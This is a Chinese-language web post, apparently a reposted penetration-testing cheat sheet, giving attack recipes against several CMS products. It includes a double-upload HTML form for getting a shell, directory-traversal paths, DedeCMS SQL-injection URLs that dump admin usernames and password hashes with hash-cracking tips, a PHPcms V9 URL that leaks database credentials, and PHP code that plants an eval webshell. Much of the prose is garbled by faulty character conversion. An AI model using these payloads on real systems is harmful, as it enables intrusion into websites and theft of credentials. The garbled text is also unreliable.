( 利用upfile_other.asp漏洞拿shell )

直接访谈会员大旨:userreg.asp

登记三个顾客并在未脱离登录的气象下,使用双文件上传工具得以爆它黄华,以下代码保存为1.html,并里面包车型地铁改换目的站,第一个上传jpg,第贰个上传cer

<HTML><HEAD> <META http-equiv=Content-Type content=”text/html; charset=gb2312″> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE>
<META content=”MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action=”“; method=post encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT style=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

别的能够使用会员中央的cookies,用火狐浏览器登入之后,访谈upfile_other.asp页面,用抓包工具去抓包,接着用明小子上传拿shell.

 

( 上传漏洞 )

漏洞文件:Upfile_Photo.asp

前提是步向后台了,访谈这几个文件,将唤起“请先选取你要上传的文件!”,用抓包工具抓助理馆员的cookies,再把上传地址跟cookies扔到名小子里上传拿shell

 

( 南方在线编辑器 )

默许后台:admin/Southidceditor/admin_style.asp

数据库路线:admin/SouthidcEditorDatasSouthidcEditor.mdb

遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..

文本上传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

体制设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

=============================================================================================================================================================

【 dedecms最新注入漏洞及找后台技术 】

拜访那一个:plus/search.php?keyword=as&typeArr[ uNion ]=a

看结果一旦提醒:Safe Alert: Request Error step 1 !

 

那正是说直接用上面包车型客车exp爆出全数管理员的帐号密码:
plus/search.php?keyword=as&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`'`+]=a

看结果一旦提醒:Safe Alert: Request Error step 2 !

那么直接用下边包车型大巴exp爆出全数管理员的帐号密码:  a199054
plus/search.php?keyword=as&typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`'`+]=a

有个别/plus/目录换来了/plugins/目录,这时将要把/plus/换来/plugins/进行注射了

破解出md5为十十二个人结果,只要求把前二位和后壹人去掉,剩余拾三个人拿去解密就能够

什么找后台?

暗许后台:dede

率先种艺术:data/mysql_error_trace.inc (不经常能够爆出路线)

其次种办法:把域名作为后台去尝尝

其三种艺术:查看那些文件:robots.txt

第八种方式:ping下域名取得ip之后, 找寻:ip:127.0.0.1 php (大概获取后台也得以博得任何旁注站,平日dede的旁站广大也是dedecms的)

=============================================================================================================================================================

【 PHPcms V9 爆数据库音讯漏洞】

间接揭发数据库连接音讯:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

至于后台拿webshell:步入后台后点击分界面–模版风格–随意找个页面点击修改,插入大家的一句话代码

<?

 

$fp = @fopen(“0day.php”, ‘a’);

@fwrite($fp, ‘<’.'?php’.”rnrn”.’eval($_POST[0day])’.”rnrn?”.”>rn”);

点击保存,接着点击可视化,代码就成功实行了,接着菜刀连接/0day.php,密码0day

本文由新金沙国际手机版发布于www.6165.com,转载请注明出处:渗透测试笔记 转载

关键词:

www.6165.com依附在”企鹅大王卡“下的灰色项目!

www.6165.com依附在”企鹅大王卡“下的灰色项目!。大家好,笔者是林神,非常久未有给大家分享过茶褐项目了,这二...

详细>>

www.6165.com数据恢复我最行-WinHex系列教程01

前几天阳阳一个朋友单位的一个Word文档出现了无法打开的问题,一般这种情况就可以用一些数据恢复软件进行恢复。...

详细>>

www.6165.com浅谈php生成静态页面

一、引 言   在进程上,静态页面要比动态页面包车型地铁假若php快非常多,那是一定的,可是由于静态页面包车型大巴狡...

详细>>

先迈开步子再找路——我的信息技术之路之二

先迈开步子再找路——我的信息技术之路之二。咱们好,前些天持续回看自身与音讯技术构成的的经验,今日谈第一...

详细>>